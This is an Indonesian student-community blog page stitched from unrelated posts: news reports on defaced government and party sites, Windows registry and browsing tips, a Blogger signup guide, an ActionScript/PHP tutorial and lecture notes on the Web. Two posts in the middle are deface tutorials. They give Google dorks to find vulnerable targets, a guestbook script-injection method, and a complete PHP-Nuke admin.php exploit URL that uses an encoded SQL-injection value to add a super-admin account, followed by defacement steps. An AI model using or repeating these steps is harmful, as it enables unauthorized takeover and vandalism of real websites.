KOSMIK (Komunitas Musik Informatika) UII

Lagi, Situs Milik Pemerintah Jadi Korban Hack

Untuk ke sekian kalinya, situs milik pemerintah menjadi korban kejahatan cyber. Kali ini, situs milik Inspektorat Jenderal Departemen Perhubungan jadi sasaran.

Dari pantauan okezone, terlihat Hacker melakukan semacam Content Management Systems (CMS) Injection pada halaman depan situs Departemen Perhubungan bagian Inspektorat Jenderal di alamat http://www.dephub.go.id/itjen.

Pelaku meninggalkan pesan persis di badan halaman depan situs tersebut, yakni:

"Patch Your System



Hardyboyz, Thanks for bugs



regards,


g0df1re."


Hacker ini disinyalir meninggalkan pesan imbauan kepada pengembanga situs untuk menutup lubang pada sistem CMS-nya. Karena ditemui lubang pada sistem CMS situs tersebut, diduga pelaku dengan mudah masuk ke dalam situs dan selanjutnya melakukan injeksi pesan.

Hingga saat ini, keadaan situs Inspektorat Jenderal Departemen Perhubungan masih belum berubah, dan belum ada tanda-tanda tindak lanjut dari pihak pengembang situs maupun keterangan resmi dari pihak Inspektorat Jenderal Departemen Perhubungan.


(sumber : www.okezone.com)

Situs PDIP Sumsel Di-Deface Penjahat Cyber

Situs Partai Demokrasi Indonesia Perjuangan untuk wilayah Sumatera Selatan berhasil di-deface penjahat dunia maya. Isinya enam tuntutan untuk kepentingan rakyat.

Dari pemantauan Okezone, Selasa (19/8/2008), situs ini berhasil diubah tampilannya dengan menggunakan background warna hitam. Di sisi atas terdapat sebuah bendera merah putih dengan format GIF sedang berkibar-kibar. Rupanya proses pen-deface-an ini sekaligus bertepatan dengan momen hari raya kemerdekaan Indonesia.

Di bawah bendera merah putih yang berkibar itulah sang cracker membubuhi enam buah tuntutan sebagai berikut,

Inilah Tuntutan Kami :
1. Turunkan harga BBM.
2. Berantas Korupsi dan KKN di Indonesia.
3. Berantas premanisme yang ada di DPR.
4. Lapangan kerja untuk rakyat.
5. Jaminan bagi pengangguran.
6. Pendidikan dan Kesehatan gratis.

Belum ada pihak yang mengaku bertanggung jawab dalam proses pengubahan tampilan situs PDIP Sumsel ini. Yang jelas di sudut kiri paling atas situs tersebut terdapat kalimat Defaced by Marlboro FIlter.

Di bagian bawah tersebut juga disematkan sebuah alamat email mfilter@linuxmail.org. Selain itu, si cracker juga menuliskan beberapa kata lain yang disinyalir sebagai perkumpulan cracker dan hacker. Di antaranya adalah batamhacker, yogyafree-underground, unsecured, samarindahack, preman, Indocarder, hackermuda @ IRC.dal.net

Tips Mengkonfigurasi Network dan Internet

Cara berikut ini dapat dilakukan untuk mempercepat browsing ketika berada di dalam jaringan computer.

1. Hapus Shortcut yang ada di [My Network Places].
2. Ganti registry untuk share folder di remote computer yang tidak bekerja secara otomatis dengan menambahkan di [My Network Places] ketika membuka dokumen share folder.

- Klik [Start] > [Run] > ketika [Regedit]

- Buka folder registry [HKEY_Current_User] > [Software] > [Microsoft] > [Windows] > [CurrentVersion] > [Policies] > [Explorer]

- Buat [DWORD] baru dengan nama [NoRecentDocsNetHood] dengan value data 1.

- Anda juga harus melihat [UseDesktopIniChace] dengan nilai 1 pada folder registry [HKEY_Current_User] > [Software] > [Microsost] > [Windows] > [CurrentVersion] > [Policies] > [Explorer].

3. Untuk menambahkan jumlah data pada satu waktu untuk dikirim ke client, anda harus merubah registry di computer anda dengan share direktori berikut,

- Buka registry folder: [HKEY_Local_Machine] > [System] > [CurrentControlSet] > [Service] > [LanmanServer] < [Parameters]

- Buat [DWORD] baru dengan nama [SizRegBuf] dengan nilai hex [FFFF]

4. Restart komputer anda

B. Memperbaiki Browsing yang lambar di semua Windows

Apa bila proses browsing terasa lambat, hapus registry berikut:

1. Klik [Start] < [Run] > ketik [regedit]
2. Buka folder registry: [HKEY_Local_Machine] > [Software] > [Microsoft] > [Windows] > [CurrentVersion] > [Explorer] > [RemoteComputer] > [NamaSpace] > [(D6277990-4C6A-8D87-00AA0060F5BF)].
3. Klik kanan pada registry di atas kemudian klik Delete.
4. Restart computer

Memperlancar Browsing Internet

• Hindari Jam Sibuk. Jika mungkin, jangan berselancar pada jam-jam sibuk (biasanya jam kerja antara pukul 09.00-17.00) agar bowser anda tidak ‘terjebak kemacetan’ lalu lintas di dunia maya karena pada jam-jam itulah orang terbanyak mengakses Internet.
• Tambahkan Cache Browser. Saat anda mengunjungi suatu situs, IE menempatkan kode HTML dan grafik dari situs tersebut pada cache. Cache membantu IE bekerja lebih cepat saat anda mengklik tombol Back. Agar berselancar menjadi cepat, anda perlu mengalokasikan jumlah yang memadai untuk cache. Dari menu Tools, pilih Internet Options, lalu tab General. Pada bagian Temporary Internet Files, klik Settings. Di bawah Amount of Disk Space to Use, geret tombol ke arah kanan. Alokasikan sekitar 5 % dari space (ruang) pada hard disk anda untuk cache.
• Tidak Menampilkan Animasi dan Multimedia. Animasi mungkin membuat berselancar menyenangkan, tetapi memperberat kerja browser. Untuk menonaktifkan animasi, klik Tools > Internet Options > tab Advanced. Geser layar ke bawah (scroll down) sehingga sampai di bagian Multimedia, hapus tanda cek pada opsi Play Animations dengan mengklik kotaknya, lalu klik OK. Kini browser hanya akan mengambil frame pertama dari setiap animasi GIF, jadi gambar yang tampil tidak bergerak. Demikian pula untuk menon-aktifkan suara dan video, kosongkan tanda cek pada kotak di depan Play Sounds dan Play Video. Bahkan kalau perlu, anda pun bisa mencegah ditampilkannya gambar (bila anda hanya butuh teks) dengan mengosongkan tanda cek di depan Show Pictures.
• Hentikan proses download. Jika browser terlalu lama mengakses suatu halaman Web dan belum selesai juga, klik tombol Stop. Anda bisa membaca sebagian isi halaman yang sempat ditampilkan, bila sesuai dengan yang anda cari, boleh dilanjutkan. Klik tombol Refresh agar IE mengulangi proses download. Kadang rute yang digunakan browser macet dan dengan mengulang proses download (refresh), browser dapat menemukan jalur baru yang ‘plong’ di Internet.
• Membuka Jendela Baru. Selama anda menunggu proses download, anda boleh melanjutkan kegiatan browsing yang lain dengan membuka jendela browser yang baru. Caranya, tekan Ctrl+N atau pilih menu File > New > Window.
• Gunakan tombol klik kanan mouse. Dengan menekan tombol klik kanan mouse pada halaman web yang ditampilkan oleh browser akan muncul pop-up menu yang isinya tergantung dari posisi pointer mouse. Penggunaan klik kanan ini banyak manfaatnya dan sangat membantu kegiatan selancar anda. Bila pointer mouse menunjuk sebuah link kemudian anda klik kanan maka akan muncul menu-menu seperti: Open in New Window (untuk membuka halaman yang ditunjuk oleh link pada jendela baru), Copy Shortcut (untuk meng-copy alamat URL dari link itu), Save Target As (untuk menyimpan file yang ditunjuk oleh link). Bila pointer mouse berada di atas sebuah (image) maka akan muncul menu Save Picture As atau Save Background As untuk menyimpan file gambar itu ke hardisk.
• Menyimpan situs favorit. Bila anda menemukan sebuah situs atau halaman web yang menarik dan anda merencanakan untuk mengunjunginya lagi suatu waktu, sebaiknya anda memasukkannya dalam daftar favorit anda. Caranya, dalam keadaan halaman web itu terbuka, klik menu Favorites lalu Add to Favorites maka akan muncul jendela pop-up. Anda boleh mengubah namanya sekehendak anda atau langsung tekan Enter (atau klik OK). Maka nama halaman web itu akan tersimpan dalam menu Favorites sebagai shortcut (jalan pintas) untuk membuka halaman web itu. Untuk mengaksesnya, kita tidak perlu lagi menulis alamat URL-nya, klik saja menu Favorites lalu pilih nama situs tersebut.
• Offline Browsing. Offline Browsing adalah sebuah cara untuk menghemat penggunaan waktu online. Dengan offline browsing, anda dapat menyimpan sebuah dokumen web ( lengkap dengan link dan isinya) ketika anda sedang online (terhubung ke internet) untuk anda buka kembali kapan saja meskipun dalam keadaan offline ( tidak terkoneksi dengan internet).

Cara Membuat Blog dengan Blogger.com

Langkah-langkahnya adalah sebagai berikut:

1. Pada address browser anda ketik http://blogger.com
2. Setelah itu akan tampil seperti terlihat pada gambar dibawah ini:

3. Klik CREATE YOUR BLOG NOW.
4. Tunggu sampai muncul tampilan seperti berikut ini:

5. Email address => di isi dengan alamat email kita (sebaiknya pake alamat email di gmail.com).
6. Enter a Password => di isi password anda
7. Retype Password => di isi dengan password yang sama dengan yang di atas.
8. Display Name => di isi dengan nama kita (ini akan ditampilkan pada blog anda nantinya)
9. Word Verification => isi persis sama dengan tulisan yang diatasnya, huruf besar ditulis dengan huruf besar gitu sebaliknya.
10. Klik/centang pada “I Agree the Term Service”.
11. Setelah itu tekan tombol Continue.
12. Selanjutnya muncul tampilan seperti berikut ini:

13. Blog Title => di isi dengan judul dari blog kita, posisinya ada pada header (bagian atas blog/pada bagian atas browser anda)
14. Blog Address (URL) => untuk ini bisa anda buat sendiri, misalnya seperti punya saya http://lbsfighter.blogspot.com. Utuk URL saya cukup dimasukkan lbsfighter pada input text, tentunya untuk URL anda lain lagi.
15. Word Verification => anda isi persis sama dengan kata yang ditampilkan dibawahnya, karena klo salah tidak akan bisa melanjut kelangkah berikutnya.
16. Jika semua sudah benar anda akan melihat seperti pada tampilan berikut ini:

17. Sekarang kita memilih template yang disediakan oleh Google, sebaiknya sebelumnya ada baiknya kita mem-Preview dulu sebelum melanjutkan kelangkah berikutnya.
18. Jika sudah cocok dengan templatenya tinggal di klik Continue.

19. Langkah selanjutnya anda tekan tombol Star Posting, untuk melakukan posting pada blog anda.

Deface guestbook (buku tamu)

Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook
(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak
semua guestbook bisa dideface.
Langkah2 nya

I. Cari target guestbook di www.google.co.id dgn mengetikkan
site:my guestbook.php atau site:com bukutamu.php

II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php
maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia.
Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,
cukup identitas palsu aja.

contoh :

Nama : boneka lucu
Email : boneka_2005@yahoo.comWebsite : www.boneka-lucu.com
Asal : toko boneka
Komentar :

Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara
SQL Injection ke guestbook tsb, disitu kita akan memasukkan
sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?
ntar dimarah mama). Trus klik tombol “submi

t” atau tombol apa
namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus
ketik target tadi www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing
lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb.
Berarti guestbook tsb bisa dideface.

Catatan :
Kalo nggak ada gambarnya, yg ada hanya tulisan

berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !
cari target yg lain.

III. Kalo udah muncul gambar yg kita masukkan tadi,
buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.

contoh :

Nama : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
Asal : dunia maya
komentar :

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.

Catatan :
Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai
keinginan lu.

IV. Klik tombol “submit” atau tombol apa namanya yg ada di guestbook tsb.
Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu.
Nah…muncul deh hasil deface kita di guestbook tsb.

Langkah-Langkah Deface

Deface situs php nuke

Buka situs www.google.com
kemudian ketik =>
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php =>
index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :

?op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.target.com/nuke/admin.php?op=mod_author

5. Disana lu di suruh login, masukin id & password lu tadi.
Masih ingat kan ?
id=budakbaonk => liat yg diatas tadi
password=bajingan => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
Berarti lu udah mengusai situs tsb skrg ! He he he he he
Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),

Kolom title:

Kolom content :
Kolom expiration => unlimited
trus klik tab add messages yg ada dibawah
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,
misal www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface lu coba klik tab refresh yg ada
diatas yg disamping url/browsing lu

Using ActionScript 3.0 with PHP Part 1: Loading External Variables

Creating dynamic websites which combine the power of Flash or Flex with PHP is easier than ever with ActionScript 3.0.. Utilizing the networking power of the Flash player we can create next-generation user interfaces which go well beyond static web pages or simple animations and instead act as the front-end for powerful applications. These applications can interface with databases and web services, giving us the ability to add new features, create ‘mash-ups’, or previously unheard-of platforms for user interaction. The sky is the limit! So let’s get started.

Server Requirements

If you are creating web applications which run Flash and PHP obviously your server needs to have PHP installed. If you plan on creating many dynamic sites or applications going forward, you will probably want server space which allows for unlimited databases, has PHP5 and MySQL, and gives you the ability to install programs on the web server. If you are using shared hosting, that is fine, but keep in mind that you will probably want to go with a Virtual Dedicated solution at some point, simply because of the flexibility and responsiveness you receive from having your “own” server. For a virtual dedicated server I personally use GoDaddy, which I wholly recommend, as I now have unlimited domains, unlimited databases, and root access to my server, so I can do a bit of shell scripting now and again. On top of that it is super-responsive which is really important for creating Flash applications which utilize networking. Otherwise if you want to pay less but still want unlimited domains and a fairly responsive system, I would go with Blue Host in North America or 1 and 1 for Europe (or other regions), and a shared hosting plan. I have experience with all three of these companies and the support is certainly top-notch.

Communicating with a Web Server

Let’s discuss three ways in which we might send data back and forth between a web server and Flash. These are by no means the only ways to do so, but they are fairly common, and you will find them to be popular ways to accomplish networking tasks.

Using GET or POST and Variables

If you are used to working with HTML front-ends and PHP (or another scripting language), this will be familiar to you. Using the GET or POST method, you can send and receive data from server-side scripts. In this scenario, we often output our data in some sort of url-encoded string, which contains variable “name and value” pairs. This is the method we will cover in this article.

Using XML

XML is one of the most important languages for communication between application, servers, and services on the Internet. One good reason to work with XML for loading data from a web server is that you will generally not have to know how the data is being processed, you will just have to know something about the particular XML formatting being used, so that you can process the data.

Using Flash Remoting

For more sophisticated integration with a server, you may want to utilize Flash remoting. If you are using Flex, you may work with Flex Data Services. If you would like an open-source solution, you might want to look into AMFPHP. We will not cover Flash remoting in this series.

Loading Variables

The first thing we will do is use GET to load variables from a PHP script. We will create a simple PHP document, called “dataLayer.php”. This page will act as our main communicator between our server and Flash.

File: dataLayer.php


$returnVars = array();
$returnVars['username'] = "John Doe";
$returnVars['email'] = "johndoe@hotmail.com";
$returnString = http_build_query($returnVars);

//send variables back to Flash
echo $returnString;

?>

So here we have our data layer. It consists of two variables: username and email. These variables are encoded using the http_build_query() function to send a properly formatted, compliant variable set from the server. Notice that this function takes an array as a parameter. It then just builds out of string in the format of name / value pairs, like so “varname=value&varname2=value”. It’s very handy.

Next, we will instruct the Flash player to load this data so that we can work with it.

Loading the Variables into Flash

Now let’s write some ActionScript to load our variables into Flash. We will do this in a document class which will be the main point of entry for our Flash movie. (If you are not familiar with the document class, see my tutorial here). Our document class will be called “Main.as” and we will utilize it with an .fla file called “main.fla”.

Complete Main.as code below. You can also download it here: data-loader.zip

package {

import flash.display.MovieClip;
import flash.events.*;
import flash.net.*;
public class Main extends MovieClip {

public function Main() {

// Prepare request

var request:URLRequest = new URLRequest("http://www.yourserver.com/dataLayer.php");
request.method = URLRequestMethod.GET;

var loader:URLLoader = new URLLoader();
loader.dataFormat = URLLoaderDataFormat.VARIABLES;
loader.addEventListener(Event.COMPLETE, completeHandler);
loader.load(request);

function completeHandler(evt:Event) {

var username = evt.target.data.username;
var email = evt.target.data.email;

trace ('username is ' + username);

trace ('email is ' + email);

}

}

}

}

You will want to replace the path (”http://www.yourserver.com/”) with your actual server and directory.

This code is very simple. You will see that we have imported appropriate classes for working with networking, and that our class (being the document class) extends MovieClip.

The first part of our constructor class prepares a request, and it uses the GET method to do so. Here we make an instance of the URLRequest object, passing it the actual web path to our php file.

var request:URLRequest = new URLRequest("http://www.yourserver.com/dataLayer.php");
request.method = URLRequestMethod.GET;

We then make a URLLoader object, specifying its dataFormat property to be “VARIABLES”. This will ensure that we can bring the variables output by PHP into Flash using the same names, and those variables can easily integrate into the scope of our Flash movie.

var loader:URLLoader = new URLLoader();
loader.dataFormat = URLLoaderDataFormat.VARIABLES;

Next we define an event handler, which is key for handling the loading of the variables. We are listening for the “COMPLETE” event, which is an event thrown by the URLLoader object that we just created. Notice that we define a handler, called completeHandler, which will do the work of processing our variables for us. This event handler will take the form of a “nested” function – a new feature in ActionScript 3 which allows us to place functions inside of functions. (I love this). After we define a handler, we then call the load() method of the URLLoader object, passing it the request objet.

loader.addEventListener(Event.COMPLETE, completeHandler);
loader.load(request);

Our completeHandler() function does the work of getting our variables from the COMPLETE event. We created a parameter called “evt”, which is populated by the event object itself when this function is called. We get the variables from PHP using the “evt” object and the following syntax: “evt.target.data.variableName“. This allows us to specify the exact variable we want to access. Lastly, we trace this data to the output window.

function completeHandler(evt:Event) {

var username = evt.target.data.username;
var email = evt.target.data.email;
trace ('username is ' + username);
trace ('email is ' + email);

}

And that’s it! This is a very simple example, but it should get you going with getting data from your PHP scripts into Flash. Obviously there is a lot more to learn about communicating with a server from Flash, but in any case, AS3 makes it simple! In the next tutorial we will talk about sending and receiving data using POST. Good luck!

internet dan web 2

World Wide Web (1)

• Web

Sistem terdistribusi yang sangat besar yang berisi jutaan klien dan server guna pengaksesan dokumen2 yang saling terhubung

Server :

- Mengelola koleksi dokumen

- Tiap dokumen disimpan sebagai sebuah file

- Dokumen dapat juga dihasilkan berdasarkan permintaan

Klien :

- Menyediakan antarmuka yang mudah digunakan oleh pengguna untuk menampilkan dan mengakses dokumen2

World Wide Web (2)

HTTP

• Hypertext Transfer Protocol : kumpula n aturan untuk pertukaran file (teks, grafik, gambar, suara, video, dll) pada web

• Konsep penting

• Ide di mana suatu file bisa mengandung referensi pada file lainnya dengan transfer permintaan ke file tersebut

URL

• Alamat sebuah file (resources) yang dapat diakses melalui internet

• Jenis resource yang diambil tergantung protokol aplikasi internet yang berlangsung, misal HTTP, File, News.

• Contoh

• file://ftp.serverku.co.id/umum/files/webprog.doc

• news://news.serverku.co.id/soc.culture.indonesia

URL (2)

• Berisi

• nama protokol, dibutuhkan untuk mengakses resources

• Nama domain, komputer tertentu yang terhubung dengan internet, tempat resource berada

• Hirarki lokasi penyimpanan resources pada komputer tersebut

URL (3)

• URL berisi nama domain yang mengidentifikasikan suatu komputer yang spesifik di Internet dan sebuah deskripsi hierarkis dari suatu lokasi file pada komputer yang bersangkutan

• Nama Domain Dikelola oleh InterNIC

URL (4)

Domain Name System